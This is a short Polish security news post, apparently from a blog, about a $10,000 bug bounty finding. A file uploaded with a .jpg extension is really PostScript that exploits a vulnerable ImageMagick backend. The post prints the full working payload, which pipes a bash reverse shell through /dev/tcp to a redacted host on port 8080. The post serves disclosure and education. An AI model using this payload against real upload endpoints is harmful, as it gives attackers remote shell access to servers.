Upload całkiem (nie)zwyczajnego logo i nagroda $10 000 (RCE)

Ciekawa podatność zgłoszona w ramach programu bug bounty.

• Upload pliku o rozszerzeniu .jpg (bezpieczne, prawda?)

• W pliku taka zawartość (jak widać jest to całkiem (nie)zwyczajny plik Postscript, który można powiedzieć jest przodkiem pdf-a):

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/███/8080 0>&1') currentdevice putdeviceprops

• Podatny Imagemagick w backendzie i na porcie 8080 słuchał już zdalnie dostępny shell

W podobnym klimacie opisywaliśmy kiedyś odczytywanie plików serwera przez “zwykły” upload pdf-ów.

–ms